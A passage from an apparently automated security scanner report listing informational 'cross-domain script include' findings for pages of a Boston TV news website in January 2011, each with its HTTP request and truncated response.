User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7057
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21627
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct</title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1512. http://www1.whdh.com/features/main/holiday_helping/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/main/holiday_helping/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /features/main/holiday_helping/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2969
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22218
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping</title>
<meta name="publisher" content="New England News Station Bos
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1513. http://www1.whdh.com/jobs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /jobs/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /jobs/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:05 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2718
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:42:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14859
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Job Postings</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1514. http://www1.whdh.com/jobs/internships

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /jobs/internships

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /jobs/internships HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:15 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: internships.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=86400
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 21:56:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close
Content-Length: 14434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Internship Opportunities</title>
<meta name="publisher" content=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1515. http://www1.whdh.com/livesky7/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /livesky7/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi

Request

GET /livesky7/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=6060
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:37:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11359
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Track Sky7</title>
<meta name="publisher" content="New England News Station Boston C
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1516. http://www1.whdh.com/news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:42:58 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1693
Cache-Control: max-age=17141
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:27:50 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107114 (MII-APC/1.6)
Content-Length: 18886
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Woman calls 911 over bad manicure</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1517. http://www1.whdh.com/news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1251
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:31:14 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17395
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bar to roast bear for Packers-Bears game</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1518. http://www1.whdh.com/news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:41 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=24129
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:38:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17127
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Teens allegedly rob motorists stuck in snow</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1519. http://www1.whdh.com/news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:42:24 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 849
Cache-Control: max-age=28020
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:28:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Content-Length: 16994
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Fla. man lets son drive because he was too drunk</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1520. http://www1.whdh.com/news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=23710
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:30:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16865
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Vt. woman facing charges for overdue library items</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1521. http://www1.whdh.com/news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:15 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37296
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:17:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19494
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Rocker Bret Michaels scheduled for surgery</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1522. http://www1.whdh.com/news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 40
Cache-Control: max-age=37453
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:18:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 19483
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Leno named Hasty Pudding man of the Year</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1523. http://www1.whdh.com/news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://img.video.ap.org/p/j/apovn.js
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38021
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:29:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19388
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Aguilera to sing national anthem at Super Bowl</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1524. http://www1.whdh.com/news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=27246
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:29:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21428
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Crews rescue car from icy waters in Scituate</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1525. http://www1.whdh.com/news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:50 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=31491
